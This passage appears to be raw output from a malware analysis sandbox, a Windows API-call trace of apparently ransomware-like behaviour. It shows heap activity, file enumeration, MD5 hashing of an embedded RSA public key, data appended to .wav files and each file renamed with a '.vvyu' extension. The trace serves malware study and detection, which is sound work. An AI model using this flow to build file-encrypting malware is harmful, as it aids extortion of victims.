(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.972] GetCurrentThreadId () returned 0x66c [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0198.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3128 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0198.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0198.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3110 | out: hHeap=0x620000) returned 1 [0198.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddb88 | out: hHeap=0x620000) returned 1 [0198.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0198.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0198.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0198.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0198.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.984] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x116dd, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x116dd, lpOverlapped=0x0) returned 1 [0198.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0198.986] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x116e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.986] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0198.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0198.987] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.987] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.987] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.988] CloseHandle (hObject=0x510) returned 1 [0198.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0198.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0198.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0198.990] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\dTVoZ bX824b.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\dtvoz bx824b.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\dTVoZ bX824b.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\dtvoz bx824b.wav.vvyu")) returned 1 [0198.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0198.991] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0198.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66735d90, ftCreationTime.dwHighDateTime=0x1d8984d, ftLastAccessTime.dwLowDateTime=0x556e4290, ftLastAccessTime.dwHighDateTime=0x1d8a2fb, ftLastWriteTime.dwLowDateTime=0x556e4290, ftLastWriteTime.dwHighDateTime=0x1d8a2fb, nFileSizeHigh=0x0, nFileSizeLow=0xdceb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FWxn.wav", cAlternateFileName="")) returned 1 [0198.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0198.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0198.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0198.995] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\FWxn.wav") returned=".wav" [0198.995] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\FWxn.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\fwxn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0198.995] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=56555) returned 1 [0198.995] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.998] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xdcc5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.998] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.001] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.001] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xdceb, lpOverlapped=0x0) returned 1 [0199.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.002] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.002] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.003] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.003] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.003] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.003] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.003] GetLastError () returned 0x0 [0199.004] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.004] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.004] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.004] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.004] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xdcf0) returned 0x2ea79b0 [0199.005] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb88 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3110 [0199.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddbd0 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.006] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0199.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3128 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0199.007] HeapFree (in: hHeap=0x620000, 